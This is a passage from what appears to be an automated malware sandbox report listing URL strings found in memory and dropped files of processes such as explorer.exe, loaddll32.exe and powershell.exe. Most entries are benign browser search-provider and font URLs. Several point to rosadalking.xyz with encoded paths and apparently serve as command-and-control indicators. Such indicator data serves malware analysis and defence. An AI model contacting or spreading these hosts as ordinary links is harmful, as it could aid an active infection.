Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp String found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8
Source: {F0C73B5B-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr String found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9
Source: loaddll32.exe, 00000000.00000003.375700561.00000000015B7000.00000004.00000001.sdmp, explorer.exe, 00000025.00000000.449476273.0000000005509000.00000004.00000001.sdmp, ~DF907A0632D9B8351A.TMP.21.dr, {F0C73B57-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr String found in binary or memory: http://rosadalking.xyz/images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/x
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001C.00000002.476825064.00000224909E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.4.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.4.dr String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.4.dr String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.4.dr String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
